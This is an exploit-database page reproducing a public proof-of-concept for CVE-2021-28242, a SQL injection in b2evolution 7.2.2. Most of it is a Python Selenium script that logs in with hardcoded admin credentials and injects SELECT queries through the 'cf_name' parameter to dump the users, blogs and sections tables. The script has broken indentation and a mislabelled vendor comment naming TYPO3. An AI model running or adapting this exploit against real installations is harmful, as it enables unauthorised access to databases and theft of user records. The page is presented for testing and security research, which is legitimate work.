Advertisement






b2evolution 7-2-2 SQL Injection

CVE Category Price Severity
CVE-2021-28242 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-05-06
CPE
cpe:cpe:/a:b2evolution:b2evolution:7.2.2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050026

Below is a copy:

b2evolution 7-2-2 SQL Injection
# Exploit Title: b2evolution 7-2-2 obtaining sensitive database information by injecting SQL commands into the "cf_name" parameter
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.06.2021
# Vendor: https://b2evolution.net/
# Link: https://b2evolution.net/downloads/7-2-2
# CVE: CVE-2021-28242
# Proof: https://streamable.com/x51kso

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28242


from selenium import webdriver
import time


# Vendor: https://typo3.org/
website_link="
http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link
"

# enter your login username
username="admin"

# enter your login password
password="FvsDq7fmHvWF"

#enter the element for username input field
element_for_username="x"

#enter the element for password input field
element_for_password="q"

#enter the element for submit button
element_for_submit="login_action[login]"


browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
#browser = webdriver.Firefox() #uncomment this line,for chrome users

browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit vulnerability MySQL obtain sensitive database information by
injecting SQL commands into the "cf_name" parameter
time.sleep(7)
# Receaving sensitive info for evo_users
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections
"))

time.sleep(7)
# Receaving sensitive info for evo_blogs
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections
"))

time.sleep(7)
# Receaving sensitive info for evo_section
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))


time.sleep(7)
browser.close()


print("At the time, of the exploit, you had to see information about the
tables...\n")



except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, your exploit is not working for some reasons...")

---------------------------------

# Exploit Title: b2evolution 7-2-2 obtaining sensitive database information
by injecting SQL commands into the "cf_name" parameter
# Date: 05.06.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-28242

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum